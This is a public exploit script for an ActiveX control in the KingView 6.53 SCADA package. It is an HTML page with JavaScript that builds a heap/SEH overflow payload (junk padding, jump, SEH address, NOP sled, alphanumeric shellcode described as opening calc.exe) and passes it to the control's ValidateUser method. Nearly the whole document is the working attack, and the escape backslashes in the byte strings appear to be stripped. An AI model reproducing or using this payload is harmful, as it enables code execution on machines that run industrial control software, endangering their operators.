# Exploit Title: KingView 6.5.3 SCADA ActiveX
# Date: March 07  2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar
# Version: 6.53 (English)
# Tested on: Windows xp sp3  running on VMware Fusion 3.1 and VirtualBox 3.2.8

Thanks to Dillon Beresford for Heap Exploit
<html>
mail----> shogilord^gmail.com spams are welcome!!!!!
    ________  _    _________   ____ __ _____   ________
   / ____/ / | |  / / ____/ | / / //_//  _/ | / / ____/
  / __/ / /  | | / / __/ /  |/ / ,<   / //  |/ / / __
 / /___/ /___| |/ / /___/ /|  / /| |_/ // /|  / /_/ /
/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/____/
    
 COLOMBIA hacking presents.............
Beijing WellinControl Technology Development Co.,Ltd FIX your KVWebSvr.dll
 
<object classid='clsid:F31C42E3-CBF9-4E5C-BB95-521B4E85060D' id='target' /></object>
<script language='javascript'>
nse="xEBx06x90x90";
seh="x4Ex20xD1x72";
nops="x90";
while (nops.length<10){ nops+="x90";}
/*Calc.exe alpha_upper badchars --> "x8bx93x83x8ax8cx8dx8fx8ex87x81x84x86x88x89x90x91x92x94x95x96x97x98x99x82x85x9fx9ax9ex9dx9bx9fx76*/
shell="x54x5fxdaxdfxd9x77xf4x5ex56x59x49x49x49x49x43x43x43x43x43x43x51x5ax56x54x58x33x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50x38x41x43x4ax4ax49x4cx4bx5ax4cx50x55x4cx4bx5ax4cx43x58x51x30x51x30x51x30x56x4fx52x48x52x43x45x31x52x4cx43x53x4cx4dx51x55x5ax58x56x30x58x38x49x57x4dx43x49x52x54x37x4bx4fx58x50x41x41";
junk1="A";
junk2="A";
while (junk1.length<624){ junk1+=junk1;}
junk1=junk1.substring(0,624);
junk2=junk1;
while (junk2.length<8073){ junk2+=junk2;}
arg2=junk1+nse+seh+nops+shell+junk2;
arg1="Anything";
target.ValidateUser(arg1 ,arg2);
 
 
</script>